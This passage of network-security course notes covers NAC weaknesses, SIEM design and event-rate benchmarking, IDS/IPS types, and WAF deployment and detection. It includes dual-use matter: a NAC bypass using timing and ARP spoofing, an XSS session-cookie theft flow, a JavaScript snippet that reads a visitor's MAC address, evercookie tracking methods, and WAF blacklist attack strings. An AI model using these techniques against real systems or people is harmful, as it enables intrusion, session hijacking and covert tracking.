o Insufficient involvement of the organization’s IT personnel in the integration
process
o Lack of security auditing to determine the product’s real-life performance by a
certified information security professional
 Vulnerabilities caused by configuration – wrong configuration of the functionalities the
product enforces within the organization, such as:
o Not enforcing/monitoring lab/development environments
o Not enforcing /monitoring different VLANs and networks, such as the VoIP
network
o Not blocking/monitoring non-interactive network modes such as Wake-on-LAN
o Not analyzing and responding to anomalies in relevant elements/protocols, and
insufficient network lock-out times
 Vulnerabilities in the product (vendor’s code)
The common attack – Bypassing & Killing the NAC
1. Some of today’s NACs are event based, so the network equipment (switch/router) allows
you to connect to the network and get an IP; some time after you connect, it sends a
message notifying the NAC of your IP and MAC, and the NAC tries to connect to your
machine and validate that it is an approved member of the network.
2. The alerting mechanism from the switches is mostly SNMP alerts called “SNMP traps”.
3. This behavior grants the attacker one to two minutes to attack/take over/infect machines
on the network before the switch port is shut down.
4. In most cases, if the port is shut down, the NAC brings it back to life after about 5
minutes in order to keep the organization operable and to accept new devices.
5. For a well-prepared hacker with automatic scripts exploiting the most common
vulnerabilities and utilizing the latest exploits, this would be sufficient.
6. The real problem is that a large number of NAC vendors provide a product which is
software based and is therefore installed mostly on common Windows or Linux
machines.
7. As is well known, common Windows and Linux machines are vulnerable to many
application layer and operating system vulnerabilities, and virtually all of them are
vulnerable to network attacks, especially layer 2 attacks.
8. This means that in those 1-2 minutes which become available every 5 minutes (roughly
12-24 minutes per hour), the attacker can find the Windows/Linux machine
hosting the NAC software and kill the communication to it using basic layer 2 attacks
such as ARP spoofing.
Open Source Solutions
 OpenNAC/FreeNAC
 PacketFence
OpenNAC/FreeNAC – Keeping It Simple
PacketFence – Almost Commercial Quality
SIEM - (Security Information Event
Management)
SIEM solutions are a combination of the formerly disparate product categories of SIM (Security Information
Management) and SEM (Security Event Management). SIEM technology provides real-time analysis of
security alerts generated by network hardware and applications. SIEM solutions come as software,
appliances or managed services, and are also used to log security data and generate reports for
compliance purposes.
The acronyms SEM, SIM and SIEM have been used interchangeably, though there are differences in
meaning and product capabilities. The segment of security management that deals with real-time
monitoring, correlation of events, notifications and console views is commonly known as Security Event
Management (SEM). The second area provides long-term storage, analysis and reporting of log data and is
known as Security Information Management (SIM).
The term Security Information Event Management (SIEM), coined by Mark Nicolett and Amrit Williams
of Gartner in 2005, describes the product capabilities of gathering, analyzing and presenting information
from network and security devices; identity and access management
applications; vulnerability management and policy compliance tools; operating system, database and
application logs; and external threat data. A key focus is to monitor and help manage user and service
privileges, directory services and other system configuration changes; as well as providing log auditing and
review and incident response.
As of January 2012, Mosaic Security Research identified 85 unique SIEM products.
SIEM Capabilities
 Data Aggregation: SIEM/LM (log management) solutions aggregate data from many sources,
including network devices, security systems, servers, databases and applications, providing the ability
to consolidate monitored data to help avoid missing crucial events.
 Correlation: looks for common attributes, and links events together into meaningful bundles. This
technology provides the ability to perform a variety of correlation techniques to integrate different
sources, in order to turn data into useful information.
 Alerting: the automated analysis of correlated events and production of alerts, to notify recipients of
immediate issues.
 Dashboards: SIEM/LM tools take event data and turn it into informational charts to assist in seeing
patterns, or identifying activity that is not forming a standard pattern.
 Compliance: SIEM applications can be employed to automate the gathering of compliance data,
producing reports that adapt to existing security, governance and auditing processes.
 Retention: SIEM/SIM solutions employ long-term storage of historical data to facilitate correlation of
data over time, and to provide the retention necessary for compliance requirements.
SIEM Architecture
 Low level, real-time detection of known threats and anomalous activity (unknown
threats)
 Compliance automation
 Network, host and policy auditing
 Network behavior analysis and situational behavior
 Log Management
 Intelligence that enhances the accuracy of threat detection
 Risk oriented security analysis
 Executive and technical reports
 A scalable high performance architecture
A SIEM is comprised of a few main modules:
1. Detector
 Intrusion Detection
 Anomaly Detection
 Vulnerability Detection
 Discovery, Learning and Network Profiling systems
 Inventory systems
2. Collector
 Connectors to Windows Machines
 Connectors to Linux Machines
 Connectors to Network Devices
 Classifies the information and events
 Normalizes the information
3. SIEM
 Risk Assessment
 Correlation
 Risk metrics
 Vulnerability scanning
 Data mining for events
 Real-time monitoring
4. Logger
 Stores the data in the filesystem/DB
 Allows storage of an unlimited number of events
 Supports SAN/NAS storage
5. Management Console & Dashboard
 Configuration changes
 Access to Dashboard and Metrics
 Multi-tenant and Multi-user management
 Access to Real-time information
 Reports generation
 Ticketing system
 Vulnerability Management
 Network Flows Management
 Responses configuration
A SIEM detector module is comprised of sensors:
 Intrusion Detection
 Anomaly Detection
 Vulnerability Detection
 Discovery, Learning and Network Profiling systems
 Inventory systems
Commonly used open source SIEM sensors:
1. Snort (Network Intrusion Detection System)
2. Ntop (Network and usage Monitor)
3. OpenVAS (Vulnerability Scanning)
4. P0f (Passive operating system detection)
5. Pads (Passive Asset Detection System)
6. Arpwatch (Ethernet/IP address pairings monitor)
7. OSSEC (Host Intrusion Detection System)
8. Osiris (Host Integrity Monitoring)
9. Nagios (Availability Monitoring)
10. OCS (Inventory)
SIEM Logics
Planning for the right amounts of data
Introduction
Critical business systems and their associated technologies are typically held to performance
benchmarks. In the security space, benchmarks of speed, capacity and accuracy are common for
encryption, packet inspection, assessment, alerting and other critical protection technologies. But
how do you set benchmarks for a tool based on collection, normalization and correlation of
security events from multiple logging devices? And how do you apply these benchmarks to
today’s diverse network environments?
This is the problem with benchmarking Security Information Event Management (SIEM)
systems, which collect security events from one to thousands of devices, each with its own
different log data format. If we take every conceivable environment into consideration, it is
impossible to benchmark SIEM systems. We can, however, set one baseline environment against
which to benchmark and then include equations so that organizations can extrapolate their own
benchmark requirements.
Consider that network and application firewalls, network and host Intrusion Detection/Prevention
(IDS/IPS), access controls, sniffers, and Unified Threat Management systems (UTM)—all log
security events that must be monitored. Every switch, router, load balancer, operating system,
server, badge reader, custom or legacy application, and many other IT systems across the
enterprise, produces logs of security events, along with every new system to follow (such as
virtualization). Most have their own log expression formats. Some systems, like legacy
applications, don’t produce logs at all.
First we must determine what is important. Do we need all log data from every critical system in
order to perform security, response, and audit? Will we need all that data at lightning speed?
(Most likely, we will not.) How much data can the network and collection tool actually handle
under load? What is the threshold before networks bottleneck and/or the SIEM is rendered
unusable, not unlike a denial of service (DoS)? These are variables that every organization must
consider as they hold SIEM to standards that best suit their operational goals.
Why is benchmarking SIEM important? According to the National Institute of Standards and Technology (NIST),
SIEM software is a relatively new type of centralized logging software compared to syslog. Our
SANS Log Management Survey shows 51 percent of respondents ranked collecting logs as their
most critical challenge – and collecting logs is a basic feature a SIEM system can provide.
Further, a recent NetworkWorld article explains how different SIEM products typically integrate
well with selected logging tools, but not with all tools. This is due to the disparity between
logging and reporting formats from different systems. There is an effort under way to standardize
logs through MITRE’s Common Event Expression (CEE) standard event log language.
But until all logs look alike, normalization is an important SIEM benchmark, which is measured
in events per second (EPS).
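To illustrate what normalization means in practice, here is a hedged sketch that maps two made-up raw log formats into one common event schema. The regexes, device formats and field names are assumptions for illustration only; real SIEM connectors are far richer:

```python
import re

# Hypothetical sketch of SIEM log normalization: two invented device
# formats are parsed into one common event dictionary.

PATTERNS = [
    # e.g. "fw1 DROP src=1.2.3.4 dst=10.0.0.1"  (fabricated firewall format)
    ("firewall", re.compile(
        r"(?P<host>\S+) (?P<action>DROP|ACCEPT) src=(?P<src>\S+) dst=(?P<dst>\S+)")),
    # e.g. "ids: alert sid=2003 1.2.3.4 -> 10.0.0.1"  (fabricated IDS format)
    ("ids", re.compile(
        r"ids: alert sid=(?P<sid>\d+) (?P<src>\S+) -> (?P<dst>\S+)")),
]

def normalize(line):
    """Map a raw log line to a common {source, src, dst, ...} dict."""
    for source, pattern in PATTERNS:
        m = pattern.search(line)
        if m:
            return {"source": source, **m.groupdict()}
    return None  # unrecognized format

print(normalize("fw1 DROP src=1.2.3.4 dst=10.0.0.1"))
```

Every recognized line, regardless of origin, ends up with the same `src`/`dst` keys, which is what makes cross-device correlation possible.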
Event performance characteristics provide a metric against which most enterprises can judge a
SIEM system. The true value of a SIEM platform, however, will be in terms of Mean Time To
Remediate (MTTR) or other metrics that can show the ability of rapid incident response to
mitigate risk and minimize operational and financial impact. In our second set of benchmarks for
storage and analysis, we have addressed the ability of SIEM to react within a reasonable MTTR
rate to incidents that require automatic or manual intervention.
Because this document is a benchmark, it does not cover the important requirements that cannot
be benchmarked, such as requirements for integration with existing systems (agent vs. agent-less,
transport mechanism, ports and protocols, interface with change control, usability of user
interface, storage type, integration with physical security systems, etc.). Other requirements that
organizations should consider but aren’t benchmarked include the ability to process connection-
specific flow data from network elements, which can be used to further enhance forensic and root-
cause analysis.
Other features, such as the ability to learn from new events, make recommendations and store
them locally, and filter out incoming events from known infected devices that have been sent to
remediation, are also important features that should be considered, but are not benchmarked here.
Variety and type of reports available, report customization features, role-based policy
management and workflow management are more features to consider as they apply to an
individual organization’s needs but are not included in this benchmark. In addition, organizations
should look at a SIEM tool’s overall history of false positives, something that can be
benchmarked, but is not within the scope of this paper. In place of false positives, Table 2
focuses on accuracy rates within applicable categories. These and other considerations are
included in the following equations, sample EPS baseline for a medium-sized enterprise, and
benchmarks that can be applied to storage and analysis. As appendices, we’ve included a device
map for our sample network and a calculation worksheet for organizations to use in developing
their own EPS benchmarks.
SIEM Benchmarking Process
The matrices that follow are designed as guidelines to assist readers in setting their own
benchmark requirements for SIEM system testing. While this is a benchmark checklist, readers
must remember that benchmarking, itself, is governed by variables specific to each organization.
For a real-life example, consider an article in eSecurity Planet, in which Aurora Health in
Michigan estimated that they produced 5,000–10,000 EPS, depending upon the time of day.
We assume that means during the normal ebb and flow of network traffic. What would that load
look like if it were under attack? How many security events would an incident, such as a virus
outbreak on one, two or three subnets, produce?
An organization also needs to consider their devices. For example, a Nokia high-availability
firewall is capable of handling more than 100,000 connections per second, each of which could
theoretically create a security event log. This single device would seem to imply a need for
100,000 minimum EPS just for firewall logs. However, research shows that SIEM products
typically handle 10,000–15,000 EPS per collector.
Common sense tells us that we should be able to handle as many events as ALL our devices could
simultaneously produce as a result of a security incident. But that isn’t a likely scenario, nor is it
practical or necessary. Aside from the argument that no realistic scenario would involve all
devices sending maximum EPS, so many events at once would create bottlenecks on the network
and overload the SIEM collectors, rendering them useless. So, it is critical to create a methodology for
prioritizing event relevance during times of load so that even during a significant incident, critical
event data is getting through, while ancillary events are temporarily filtered.
Speed of hardware, NICs (network interface cards), operating systems, logging configurations,
network bandwidth, load balancing and many other factors must also go into benchmark
requirements. One may have two identical server environments with two very different EPS
requirements due to any or all of these and other variables. With consideration of these variables,
EPS can be established for normal and peak usage times. We developed the equations included
here, therefore, to determine Peak Events (PE) per second and to establish normal usage by
exchanging the PEx for NEx (Normal Events per second).
List all of the devices in the environment expected to report to the SIEM. Be sure to consider any
planned changes, such as adding new equipment, consolidating devices, or removing end of life
equipment. First, determine the PE (or NE) for each device with these steps:
1. Carefully select only the security events intended to be collected by the SIEM. Make
sure those are the only events included in the sample being used for the formula.
2. Select reasonable time frames of known activity: Normal and Peak (under attack, if
possible). This may be any period from minutes to days. A longer period of time, such
as a minimum of 90 days, will give a more accurate average, especially for “normal”
activity.
Total the number of Normal or Peak events during the chosen period. (It will also be
helpful to consider computing a “low” activity set of numbers, because fewer events may
be interesting as well.)
3. Determine the number of seconds within the time frame selected.
4. Divide the number of events by the number of seconds to determine PE or NE for the
selected device.
Formula 1:
EPS = (# of Security Events) / (Time Period in Seconds)
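As a worked example of Formula 1, assuming a hypothetical device that produced 1,800,000 security events over a one-hour peak window (the numbers are made up for illustration):

```python
def eps(event_count, seconds):
    """Formula 1: events per second over an observation window."""
    return event_count / seconds

# 1,800,000 security events observed over a 1-hour (3600 s) peak window
print(eps(1_800_000, 3600))  # 500.0 EPS
```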
5. The resulting EPS is the PE or NE depending upon whether we began with peak activity
or normal activity. Once we have completed this computation for every device needing
security information event management, we can insert the resulting numbers in the
formula below to determine Normal EPS and Peak EPS totals for a benchmark
requirement.
Formula 2:
1. In your production environment, determine the peak number of security events (PEx)
created by each device that requires logging, using Formula 1. If you have identical
devices with identical hardware, configurations, load, traffic, etc., you may use
[PEx x (# of identical devices)] to avoid having to determine PE for every device.
2. Sum all PE numbers to come up with a grand total for your environment.
3. Add at least 10% to the sum for headroom and another 10% for growth.
So, the resulting formula looks like this:
Step 1: (PE1 + PE2 + PE3 ... + (PE4 x D4) + (PE5 x D5) ...) = SUM1 [baseline PE]
Step 2: SUM1 + (SUM1 x 10%) = SUM2 [adds 10% headroom]
Step 3: SUM2 + (SUM2 x 10%) = Total PE benchmark requirement [adds 10% growth
potential]
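The three steps can be sketched as a small calculation; the per-device peak EPS values and device counts below are made-up example inputs:

```python
def total_pe(device_peaks, headroom=0.10, growth=0.10):
    """Formula 2: sum per-device peak EPS, add headroom, then growth."""
    sum1 = sum(pe * count for pe, count in device_peaks)  # Step 1: baseline PE
    sum2 = sum1 * (1 + headroom)                          # Step 2: +10% headroom
    return sum2 * (1 + growth)                            # Step 3: +10% growth

# (peak EPS, number of identical devices) per device class -- example values
devices = [(500.0, 1), (120.0, 7), (60.0, 4)]
print(total_pe(devices))
```

With these inputs the baseline PE is 1,580 EPS, and the benchmark requirement after headroom and growth is about 1,912 EPS.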
Once these computations are complete, the resulting Peak EPS set of numbers will reflect that
grand, but impractical, peak total mentioned above. Again, it is unlikely that all devices will ever
simultaneously produce log events at maximum rate. Seek consultation from SMEs and the
system engineers provided by the vendor in order to establish a realistic Peak EPS that the SIEM
system must be able to handle, and then set filters for getting required event information through
to SIEM analysis, should an overload occur.
We have used these equations to evaluate a hypothetical mid-market network with a set number
of devices. If readers have a similar infrastructure, similar rates may apply. If the organization is
different, the benchmark can be adjusted to fit organizational infrastructures using our equations.
The Baseline Network
A mid-sized organization is defined as having 500–1000 users, according to a December guide by
Gartner, Inc., titled “Gartner’s New SMB Segmentation and Methodology.” Gartner Principal
Analyst Adam Hils, together with a team of Gartner analysts, helped us determine that a 750–
1000 user organization is a reasonable base point for our benchmark. As Hils puts it, this number
represents some geo and technical diversity found in large enterprises without being too complex
to scope and benchmark.
With Gartner’s advice, we set our hypothetical organization to have 750 employees, 750 user end
points, five offices, six subnets, five databases, and a central data center. Each subnet will have
an IPS, a switch and gateway/router. The data center has four firewalls and a VPN. (See the
matrix below and Appendix A, “Baseline Network Device Map,” for more details.)
Once the topography is defined, the next stage is to average EPS collected from these devices
during normal and peak periods. Remember that demanding all log data at the highest speed
24x7 could, in itself, become problematic, causing a potential DoS situation with network or SIEM
system overload. So realistic speeds based on networking and SIEM product restrictions must
also be considered in the baseline.
Protocols and data sources present other variables to consider when determining average and peak
load requirements. In terms of effect on EPS rates, our experience is that systems using UDP can
generate more events more quickly, but this creates a higher load for the management tool, which
actually slows collection and correlation when compared to TCP. One of our reviewing analysts
has seen UDP packets dropped at 3,000 EPS, while TCP could maintain a 100,000 EPS load. It’s
also been our experience that both protocols are typically used in a single environment. Table 1,
“Baseline Network Device EPS Averages,” provides a breakdown of Average, Peak and Averaged Peak
EPS for the different systems that logs are collected from. Each total below is the result of device
quantity (column 1) x EPS calculated for the device. For example, 0.60 Average EPS for Cisco
Gateway/Routers has already been multiplied by the quantity of 7 devices. So the EPS per single
device is not displayed in the matrix, except when the quantity is 1.
To calculate Average Peak EPS, we determined two subnets under attack, with affected devices
sending 80 percent of their EPS capacity to the SIEM. These numbers are by no means scientific.
But they do represent research against product information (number of events devices are capable
of producing), other research, and the consensus of expert SANS Analysts contributing to this
paper.
A single security incident, such as a quickly replicating worm in a subnet, may fire off thousands
of events per second from the firewall, IPS, router/switch, servers, and other infrastructure at a
single gateway. What if another subnet falls victim and the EPS are at peak in two subnets?
Using our baseline, such a scenario with two infected subnets representing 250 infected end
points could theoretically produce 8,119 EPS.
We used this as our Average Peak EPS baseline because this midline number is more
representative of a serious attack on an organization of this size. In this scenario, we still have
event information coming from servers and applications not directly under attack, but there is
potential impact to those devices. It is important, therefore, that these normal logs, which are
useful in analysis and automatic or manual reaction, continue to be collected as needed.
SIEM Storage and Analysis
Now that we have said so much about EPS, it is important to note that no one ever analyzes a
single second’s worth of data. An EPS rating is simply designed as a guideline to be used for
evaluation, planning and comparison. When designing a SIEM system, one must also consider
the volume of data that may be analyzed for a single incident. If an organization collects an
average of 20,000 EPS over eight hours of an ongoing incident, that will require sorting and
analysis of 576,000,000 data records. Using a 300 byte average size, that amounts to 172.8
gigabytes of data. This
consideration will help put into perspective some reporting and analysis baselines set in the below
table. Remember that some incidents may last for extended periods of time, perhaps tapering off,
then spiking in activity at different points during the attack.
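The arithmetic above can be checked directly, using the 300-byte average event size and decimal gigabytes as stated in the text:

```python
def incident_storage(eps, hours, avg_event_bytes=300):
    """Data volume for an incident window: EPS x seconds x event size."""
    records = eps * hours * 3600            # total event records
    gigabytes = records * avg_event_bytes / 1e9  # decimal gigabytes
    return records, gigabytes

records, gb = incident_storage(20_000, 8)
print(records, gb)  # prints: 576000000 172.8
```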
While simple event performance characteristics provide a metric against which most enterprises
can judge a SIEM, as mentioned earlier, the ultimate value of a well-deployed SIEM platform
will be in terms of MTTR (Mean “Time To Remediate”) or other metrics that can equate rapid
incident response to improved business continuity and minimal operational/fiscal impact.
It should be noted in this section, as well, that event storage may refer to multiple data facilities
within the SIEM deployment model. There is a local event database, used to perform active
investigations and forensic analysis against recent activities; long-term storage, used as an archive
of summarized event information that is no longer granular enough for comprehensive forensics;
and read/only and encrypted raw log storage, used to preserve the original event for forensic
analysis and nonrepudiation—guaranteeing chain of custody for regulatory compliance.
Baseline Network Device Map
This network map is the diagram for our sample network. Traffic flow, points for collecting
and/or forwarding event data, and throttle points were all considered in setting the benchmark
baseline in Table 1.
EPS Calculation Worksheet
Common SIEM Report Types
1. Security SIEM DB
2. Logger DB
3. Alarms
4. Incidents
5. Vulnerabilities
6. Availability
7. Network Statistics
8. Asset Information and Inventory
9. Ticketing system
10. Network
Custom Reports
Defining the right Rules – It’s all about the rules
When it comes to a SIEM, it is all about the rules.
The SIEM can be configured to be most effective and produce the best results by:
1. Defining the right rules that define “what is considered a security event/incident”
2. Implementing an automated response/mitigation action to stop it at real time
3. Configuring it to alert the right person for each incident - in real time
An example of a subset of a few events, which together represent a security incident:
1. An IP on the internet port-scans the organization’s addresses; the port scan is detected
and logged
2. 10 days later, a machine from the internal network connects to that IP = intrusion!
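This two-event incident can be expressed as a simple correlation rule over normalized events: remember which external IPs port-scanned us, then alert when an internal host later connects out to one of them. A hypothetical pure-Python sketch; the event field names and the retention window are assumptions, not any specific SIEM's rule language:

```python
from datetime import datetime, timedelta

WINDOW = timedelta(days=30)  # assumed: how long a scanner IP stays "suspicious"

def correlate(events):
    """Flag outbound connections to IPs that previously port-scanned us."""
    scanners = {}   # external IP -> time of last observed port scan
    incidents = []
    for ev in events:
        if ev["type"] == "portscan":
            scanners[ev["src"]] = ev["time"]
        elif ev["type"] == "outbound_conn":
            seen = scanners.get(ev["dst"])
            if seen and ev["time"] - seen <= WINDOW:
                incidents.append(ev)  # internal host called back a scanner
    return incidents

t0 = datetime(2012, 1, 1)
events = [
    {"type": "portscan", "src": "203.0.113.9", "time": t0},
    {"type": "outbound_conn", "src": "10.0.0.7", "dst": "203.0.113.9",
     "time": t0 + timedelta(days=10)},  # 10 days later -> intrusion
]
print(correlate(events))
```

Neither event is alarming on its own; only the correlation between them, across a 10-day gap, reveals the incident.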
IDS/IPS
Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS),
are network security appliances that monitor network and/or system activities for malicious activity. The
main functions of intrusion prevention systems are to identify malicious activity, log information about said
activity, attempt to block/stop activity, and report activity.
Intrusion prevention systems are considered extensions of intrusion detection systems because they both
monitor network traffic and/or system activities for malicious activity. The main differences are, unlike
intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively
prevent/block intrusions that are detected. More specifically, IPS can take such actions as sending an
alarm, dropping the malicious packets, resetting the connection and/or blocking the traffic from the
offending IP address. An IPS can also correct Cyclic Redundancy Check (CRC) errors, defragment packet
streams, prevent TCP sequencing issues, and clean up unwanted transport and network layer options.
IPS Types
1. Network-based intrusion prevention system (NIPS): monitors the entire network for suspicious
traffic by analyzing protocol activity.
2. Wireless intrusion prevention system (WIPS): monitors a wireless network for suspicious
traffic by analyzing wireless networking protocols.
3. Network behavior analysis (NBA): examines network traffic to identify threats that generate
unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of
malware, and policy violations.
4. Host-based intrusion prevention system (HIPS): an installed software package which monitors
a single host for suspicious activity by analyzing events occurring within that host.
Detection Methods
1. Signature-Based Detection: This method of detection utilizes signatures, which are attack
patterns that are preconfigured and predetermined. A signature-based intrusion prevention system
monitors the network traffic for matches to these signatures. Once a match is found the intrusion
prevention system takes the appropriate action. Signatures can be exploit-based or vulnerability-
based. Exploit-based signatures analyze patterns appearing in exploits being protected against,
while vulnerability-based signatures analyze vulnerabilities in a program, its execution, and
conditions needed to exploit said vulnerability.
2. Statistical anomaly-based detection: This method of detection baselines performance of average
network traffic conditions. After a baseline is created, the system intermittently samples network
traffic, using statistical analysis to compare the sample to the set baseline. If the activity is outside
the baseline parameters, the intrusion prevention system takes the appropriate action.
3. Stateful Protocol Analysis Detection: This method identifies deviations of protocol states by
comparing observed events with "predetermined profiles of generally accepted definitions of
benign activity."
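The baselining step of statistical anomaly-based detection can be sketched in a few lines. This is a simplified illustration, not a real IPS engine; the sample traffic values and the z-score threshold of 3 are arbitrary assumptions:

```python
import statistics

def build_baseline(samples):
    """Compute mean and standard deviation of normal traffic volumes."""
    return statistics.mean(samples), statistics.stdev(samples)

def is_anomalous(observation, mean, stdev, z_threshold=3.0):
    """Flag an observation that deviates too far from the baseline."""
    if stdev == 0:
        return observation != mean
    return abs(observation - mean) / stdev > z_threshold

# Baseline built from packets-per-second samples of "normal" traffic
baseline_mean, baseline_stdev = build_baseline([100, 110, 95, 105, 98, 102])

print(is_anomalous(104, baseline_mean, baseline_stdev))  # within the baseline
print(is_anomalous(900, baseline_mean, baseline_stdev))  # e.g. a traffic flood
```

A real system would re-sample intermittently and compare each sample against the stored baseline before deciding whether to take action.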
Signature Catalog:
Alert Monitoring:
Security Reporting:
Alert Monitor:
Anti-Virus:
Web content protection & filtering
Session Hi-Jacking and Internal Network Man-In-The-Middle
XSS Attack Vector
The attack flow:
1. The attacker finds an XSS vulnerability in the server/website/web application
2. The attacker creates an encoded URL attack string to decrease suspicion level
3. The attacker spreads the link to a targeted victim or to a distribution list
4. The victim logs into the web application, clicks the link
5. The attacker’s code is executed under the victim’s credentials and sends the unique
session identifier to the attacker
6. The attacker plants the unique session identifier in his browser and is now connected to
the system as the victim
The Man-In-The-Middle Attack Vector
• Taking over an active session to a computer system
• In order to attack the system, the attacker must know the protocol/method being used to
handle the active sessions with the system
• In order to attack the system, the attacker must obtain the user’s session identifier
(session id, session hash, token, IP)
• The most common use of Session Hi-Jacking revolves around textual protocols such as
HTTP, where the identifier is the ASPSESSID/PHPSESSID/JSESSION parameter located
in the HTTP Cookie header, a.k.a. “the session cookie”
• The most common Session Hi-Jacking scenarios combine it with:
• XSS - Where the session cookie is read by an attacker’s JavaScript code
• Man-In-The-Middle – Where the cookie is sent over clear-text HTTP through the
attacker’s machine, which becomes the victim’s gateway
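A minimal sketch of how the session identifier sits inside the Cookie header described above; the cookie value here is hypothetical, and Python's standard `http.cookies` module is used only to illustrate the parsing:

```python
from http.cookies import SimpleCookie

# A raw Cookie header as sent by a victim's browser (hypothetical values)
raw_header = "PHPSESSID=8f3b2c1d9e; theme=dark"

cookie = SimpleCookie()
cookie.load(raw_header)

# The session identifier an attacker is after in a hijacking scenario
session_id = cookie["PHPSESSID"].value
print(session_id)  # 8f3b2c1d9e
```

Whoever possesses this value can present it to the server and be treated as the victim's session, which is exactly why it must never travel over clear-text HTTP or be readable by injected script.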
HTML5 and New Client-Side Risks
Cookie/Repository User Tracking
Tracking Users Using HTML5 Local Storage Feature
• HTML5 provides a feature that allows planting persistent information on users’ computers
• A tracker can be planted pre-emptively or during an identified attack
• Since the information is persistent, it is possible to retrieve and inspect it at any later
date, and the attacker can be identified
Tracking Users Using HTML5 Local Storage Feature
• Types of “Ever Cookies” (tracking features)
• Standard HTTP Cookies
• Silverlight Isolated Storage
• Local Shared Objects (Flash Cookies)
• Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5
Canvas tag to read pixels (cookies) back out
• Storing cookies in and reading out Web History
• Storing cookies in HTTP ETags
• Internet Explorer userData storage
• HTML5 Session Storage
• HTML5 Local Storage
• HTML5 Global Storage
• HTML5 Database Storage via SQLite
User TraceBack Techniques
JAVA Trackback Techniques
MAC ADDRESS Detection Of All Network Interfaces via JAVA
You can steal the user’s MAC address with Java 1.6; for Internet Explorer you can use an applet.
This information is very sensitive, because the MAC address is a unique identifier. Although it
can easily be changed by the user, it can help identify users with dynamic IP addresses or users
behind proxies.
function get_mac() {
    try {
        // Enumerate all network interfaces via the Java bridge (LiveConnect)
        var ifaces = java.net.NetworkInterface.getNetworkInterfaces();
        var ifaces_list = java.util.Collections.list(ifaces);
        for (var i = 0; i < ifaces_list.size(); i++) {
            // getHardwareAddress() returns the MAC as a byte array, or null
            var mac = ifaces_list.get(i).getHardwareAddress();
            if (mac) {
                return mac;
            }
        }
    } catch (e) { }
    return false;
}
XSS + Browser Location Services
Browser/Smart-Phone Location Services
Browser Location Services (FireFox)
Browser Location Services (Google Chrome)
Browser Location Services Working Behind Tor Anonymity Network
Use your power to protect and enforce – GPO
Policy name | Policy path
Prevent Deleting Download History | Windows Components\Internet Explorer\Delete Browsing History
Disable add-on performance notifications | Windows Components\Internet Explorer
Enable alternative codecs in HTML5 media elements | Windows Components\Internet Explorer\Internet Control Panel\Advanced settings\Multimedia
Allow Internet Explorer 8 Shutdown Behavior | Windows Components\Internet Explorer
Install binaries signed by MD2 and MD4 signing technologies | Windows Components\Internet Explorer\Security Features\Binary Behavior Security Restriction
Automatically enable newly installed add-ons | Windows Components\Internet Explorer
Turn off Managing SmartScreen Filter | Windows Components\Internet Explorer
Prevent configuration of top result search in the Address bar | Windows Components\Internet Explorer\Internet Settings\Advanced settings\Searching
Prevent Deleting ActiveX Filtering and Tracking Protection data | Windows Components\Internet Explorer\Delete Browsing History
Go to an intranet site for a single word entry in the Address bar | Windows Components\Internet Explorer\Internet Settings\Advanced settings\Browsing
Show tabs below Address bar | Windows Components\Internet Explorer\Toolbars
Prevent users from bypassing SmartScreen Filter's application reputation warnings about files that are not commonly downloaded from the Internet | Windows Components\Internet Explorer
Disable Browser Geolocation | Windows Components\Internet Explorer
Turn off ability to pin sites | Windows Components\Internet Explorer
Turn on ActiveX Filtering | Windows Components\Internet Explorer
Configure Tracking Protection Lists | Windows Components\Internet Explorer\Privacy
Tracking Protection Threshold | Windows Components\Internet Explorer\Privacy
Turn off Tracking Protection | Windows Components\Internet Explorer\Privacy
 Prevent users from bypassing SmartScreen Filter’s application reputation warnings about files that are not
commonly downloaded from the Internet
 Prevent Deleting Download History
 Install binaries signed by MD2 and MD4 signing technologies
 Do not automatically enable newly installed add-ons
 Turn off Managing SmartScreen Filter
 Turn on ActiveX filtering
 Enable alternate codecs in HTML5 media elements
 Prevent Deleting ActiveX Filtering and Tracking Protection data
 Disable Browser Geolocation (“Browser Location Services”)
Make sure Internet Explorer Protected Mode Is Enforced:
Choosing, Implementing and Testing Web Application Firewalls
Web applications often contain serious vulnerabilities, and a WAF provides a very important extra
protection layer for a web solution. Hackers can find access points through errors in code, so
placing a WAF in front of a web application is very important for security.
A WAF acts as a special mechanism governing the interaction between the server and client while
processing HTTP packets. It also provides a way to monitor the data as it is received from the
outside. The solution is based on a set of rules that exposes attacks targeting the server.
Traditionally, web application firewalls protected large websites such as banks, online retailers,
social networks and large companies, but now anyone can deploy one thanks to the open-source
solutions that are available.
WAF can be implemented in two ways, via hardware or software, and in three forms:
1. Implemented as a reverse proxy server.
2. Implemented in routing mode / bridge.
3. Integrated in the Web application.
The first form is exemplified by mod_security, Barracuda and nevisProxy. These WAFs
automatically block or redirect requests to the web server without changing or editing the data.
The second category consists mainly of hardware WAFs, for example Imperva SecureSphere
(impervaguard.com). These solutions require additional configuration on the internal network, but
the option eventually pays off in throughput.
And finally, the third type lives inside the web application itself, for example a WAF integrated
into the CMS.
WAF rules comprise a blacklist (a list of unacceptable actions) and a whitelist (accepted and
permitted actions). For example, a blacklist may contain strings like "UNION SELECT",
"<script>" and "/etc/passwd", while a whitelist rule may constrain a parameter to a numeric
value (from 0 to 65535).
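As a sketch of how such rules might be evaluated: the blacklist patterns and the 0-65535 whitelist rule below mirror the examples in the text, while everything else (function names, rule layout) is assumed purely for illustration:

```python
import re

# Hypothetical rule sets modelled on the examples in the text
BLACKLIST = [r"UNION\s+SELECT", r"<\s*script", r"/etc/passwd"]

def blacklist_hit(value):
    """Return True if the value matches any forbidden pattern."""
    return any(re.search(p, value, re.IGNORECASE) for p in BLACKLIST)

def whitelist_ok(value):
    """Whitelist rule: the parameter must be a number from 0 to 65535."""
    return value.isdigit() and 0 <= int(value) <= 65535

print(blacklist_hit("id=1 UNION SELECT password"))  # matches -> block
print(whitelist_ok("8080"))                         # numeric -> allow
print(whitelist_ok("1 OR 1=1"))                     # not numeric -> block
```

Note the asymmetry: the blacklist must anticipate every attack string, while the whitelist only has to describe legitimate input, which is why whitelisting is stronger but costs more development effort.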
Detecting Web Application Firewalls
We will now look at how a pentester can detect the WAF server and, more importantly, how to
bypass it.
Each firewall responds in a characteristic way that helps identify the type of WAF in place (its
fingerprint), for example:
• HTTP-response cookie parameters
• Modified HTTP headers that mask the server
• The way it responds to special data and queries
• The way it closes connections upon unauthorized actions
For example, when we launch an attack against mod_security we get a 501 error code; WebKnight
returns code 999; Barracuda reveals itself through the cookie parameter barra_counter_session.
This can certainly help in identifying the WAF, and some scanners can automate the operation,
such as the w3af framework plug-in WAF_fingerprint and wafw00f. These tools are important for
the pentesting operation.
